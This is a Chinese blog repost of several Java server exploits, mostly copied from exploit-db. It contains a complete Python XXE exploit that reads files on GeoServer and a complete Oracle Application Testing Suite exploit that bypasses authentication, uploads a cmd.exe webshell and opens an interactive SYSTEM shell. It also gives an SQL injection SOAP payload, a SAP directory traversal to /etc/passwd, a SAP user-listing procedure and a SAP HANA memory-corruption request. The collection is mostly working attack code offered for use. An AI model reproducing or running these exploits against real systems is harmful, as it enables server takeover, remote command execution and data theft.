20160529整理到几个新的Java容器漏洞
来源:互联网 发布:程序员鼓励师工资 编辑:程序博客网 时间:2024/03/29 19:29
Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XXE Exploit
# Exploit Title : GeoServer XXE# Date : 11/08/2015# Exploit Author : David Bloom (Script) - (Ping to Sven Claessens, Jacques Villemur and Eric Donners)# Vendor homepage : http://geoserver.org# Software Link : http://geoserver.org/release/stable# Version : 2.7 : <2.7.1.1 / 2.6 : <2.6.4 / 2.5 : <2.5.5.1 # Tested : Client Windows, Server Linux/Jetty # Vendor bug track : GEOS-7032# CVE : No CVE# Category : Webapps# Description : An XXE vulnerability in geoserver allows to view file contents and list directories on the server. from xml.etree import ElementTreeimport sysimport urllib2import urllib def main(): print '\n-----------------------\nGeoServer XXE Exploit\nScript by David Bloom\nTwitter: @philophobia78\n-----------------------\n' if len(sys.argv) != 3 : print "Usage geoserver-xxe.py [URL] [File Or Dir]" return geoServerUrl = sys.argv[1] fileName = sys.argv[2] featuresUrl = geoServerUrl + "/wfs?request=GetCapabilities" exploitUrl = geoServerUrl + "/wfs?request=GetFeature&SERVICE=WFS&VERSION=1.0.0&TYPENAME=@candidateFeature@&FILTER=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%20%3C!DOCTYPE%20foo%20[%20%3C!ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F@targetFile@%22%20%3E]%3E%3CFilter%20%3E%3CPropertyIsEqualTo%3E%3CPropertyName%3E%26xxe%3B%3C%2FPropertyName%3E%3CLiteral%3EBrussels%3C%2FLiteral%3E%3C%2FPropertyIsEqualTo%3E%3C%2FFilter%3E" response = urllib2.urlopen(featuresUrl) root = ElementTree.fromstring(response.read()) print "Searching geoserver features ... : \n" gsFeatures = [] for node in root.iter(): if 'FeatureTypeList' in node.tag : for feature in node.iter(): if 'Name' in feature.tag : gsFeatures.append(feature.text) print "Feature found :" + feature.text if not gsFeatures: print "No geoserver feature found, wrong url ?" return print "\nCandidate used : " + gsFeatures[0] + "\n" print "Trying XXE : " print "-------------\n" exploitUrl = exploitUrl.replace("@candidateFeature@",gsFeatures[0]) exploitUrl = exploitUrl.replace("@targetFile@",fileName) print exploitUrl + "\n\n" try : response = urllib2.urlopen(exploitUrl) # Clean output from exceptions string trashOutput = response.read() beginRef = "Illegal property name:" endRef = "for feature type" fileStart = trashOutput.index(beginRef) + len(beginRef) fileStop = trashOutput.index(endRef) print "Output" print "-------\n" print trashOutput[fileStart:fileStop].strip() except : print "An error occured, maybe a premission error" if __name__ == '__main__': main()
Oracle Application Testing Suite 12.4.0.2.0 - Authentication Bypass and Arbitrary File Upload Exploit
import urllib2import urllib ip = '192.168.150.239'port = 8088 url = "http://" + ip + ":" + str(port)#bypass authenticationurl = url+"/olt/Login.do/../../olt/UploadFileUpload.do"request = urllib2.Request(url) webshell_content='''<%@ page import="java.util.*,java.io.*" %> <% if (request.getParameter("{cmd}") != null) {{ Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("{cmd}")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while (disr != null) {{ out.println(disr); disr = dis.readLine(); }} }} %>'''boundary = "---------------------------7e01e2240a1e"request.add_header('Content-Type', "multipart/form-data; boundary=" + boundary)post_data = "--" + boundary + "\r\n"post_data = post_data + "Content-Disposition: form-data; name=\"storage.extension\"\r\n"post_data = post_data + "\r\n.jsp\r\n"post_data = post_data + "--" + boundary + "\r\n"post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n"post_data = post_data + "\r\nwebshell.jsp\r\n"post_data = post_data + "--" + boundary + "\r\n"post_data = post_data + "Content-Disposition: form-data; name=\"fileName2\"\r\n"post_data = post_data + "\r\n\r\n"post_data = post_data + "--" + boundary + "\r\n"post_data = post_data + "Content-Disposition: form-data; name=\"fileName3\"\r\n"post_data = post_data + "\r\n\r\n"post_data = post_data + "--" + boundary + "\r\n"post_data = post_data + "Content-Disposition: form-data; name=\"fileName4\"\r\n"post_data = post_data + "\r\n\r\n"post_data = post_data + "--" + boundary + "\r\n"post_data = post_data + "Content-Disposition: form-data; name=\"fileType\"\r\n"post_data = post_data + "\r\n*\r\n"post_data = post_data + "--" + boundary + "\r\n"post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n"post_data = post_data + "Content-Type: text/plain\r\n"post_data = post_data + "\r\n" + webshell_content +"\r\n"post_data = post_data + "--" + boundary + "\r\n"post_data = post_data + "Content-Disposition: form-data; name=\"storage.repository\"\r\n"post_data = post_data + "\r\nDefault\r\n"post_data = post_data + "--" + boundary + "\r\n"post_data = post_data + "Content-Disposition: form-data; name=\"storage.workspace\"\r\n"post_data = post_data + "\r\n.\r\n"post_data = post_data + "--" + boundary + "\r\n"post_data = post_data + "Content-Disposition: form-data; name=\"directory\"\r\n"post_data = post_data + "\r\n" + "../oats\servers\AdminServer\\tmp\_WL_user\oats_ee\\1ryhnd\war\pages" +"\r\n"post_data = post_data + "--" + boundary + "--"+"\r\n" try: request.add_data(post_data) response = urllib2.urlopen(request) if response.code == 200 : print "[+]upload done!" webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp" print "[+]wait a moment,detecting whether the webshell exists..." if urllib2.urlopen(webshellurl).code == 200 : print "[+]upload webshell successfully!" print "[+]return a cmd shell" while True: cmd = raw_input(">>: ") if cmd == "exit" : break print urllib.urlopen(webshellurl+"?{cmd}=" + cmd).read().lstrip() else: print "[-]attack fail!" else: print "[-]attack fail!"except Exception as e: print "[-]attack fail!" '''#run the exploit and get a cmd shellroot@kali:~/Desktop# python exploit.py [+]upload done![+]wait a moment,detecting whether the webshell exists...[+]upload webshell successfully![+]return a cmd shell>>: whoamint authority\system >>: exit'''
https://www.exploit-db.com/exploits/39840/
POST /XXX/UDDISecurityImplBean HTTP/1.1Content-Type: text/xml <SOAP-ENV:Envelopexmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:xsd="http://www.w3.org/2001/XMLSchema"> XXX <permissionId>x' AND 1=(SELECT COUNT(*) FROM BC_UDV3_EL8EM_KEY) or'1'='1</permissionId> XXX </SOAP-ENV:Envelope>
SAP NetWeaver AS JAVA 7.1 - 7.5 - Information Disclosure
https://www.exploit-db.com/exploits/39841/1. Open http://SAP:50000/webdynpro/resources/sap.com/XXX/JWFTestAddAssignees#page on SAP server 2. Press "Choose" button 3. In the opened window press “Search” You will get a list of SAP users 8. REPORT TIMELINE Sent: 15.09.2015Reported: 15.09.2015Vendor response: 16.09.2015Date of Public Advisory: 09.02.2016
SAP xMII 15.0 - Directory Traversal
https://www.exploit-db.com/exploits/39837/PoC GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd
SAP HANA 1.00.095 - hdbindexserver Memory Corruption
https://www.exploit-db.com/exploits/39382/Proof of concept This authentication request should be replayed 10 times. curl -v -XPOST http://hana:8000/sap/hana/xs/formLogin/login.xscfunc -H'Content-type: application/x-www-form-urlencoded; charset=UTF-8' -H'X-csrf-token: unsafe' -d'xs-username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
0 0
- 20160529整理到几个新的Java容器漏洞
- Java容器的总结整理
- 发现的新漏洞
- 整理几个java游戏开发的链接
- 几个主流的Java连接池整理
- 整理几个常用的Java面试题
- 几个主流的Java连接池整理
- 几个主流的Java连接池整理
- Java容器整理
- java容器类整理
- WTL 8.0的几个漏洞
- 整理到的几个关于nebula的网站
- java新特性的一些整理
- 关于Java中使用容器的几个注意点
- JDK 1.5 到1.8出现的新特性 收藏整理
- 泄露的cisco ASA漏洞利用可以应用到新的cisco版本上
- Java常用容器特性整理
- 整理的几个不错的java学习网站
- 理解 chroot
- 11.Tornado在TCP层里的工作机制---TCP层的实现
- 从指定页插入页眉页脚
- windows GUI开发00 - 前言
- git branch 和 tag的区别
- 20160529整理到几个新的Java容器漏洞
- 二叉树的创建和相关算法
- WebSocket 和 Golang 实现聊天功能
- JQuery中的全选择器(通配符)
- FPGA视觉从入门到放弃——懒人的支持向量机
- sublime下运行python程序
- [linux 命令笔记] kill
- 枚举类型的构造方法
- iOS-绑定key与属性名方法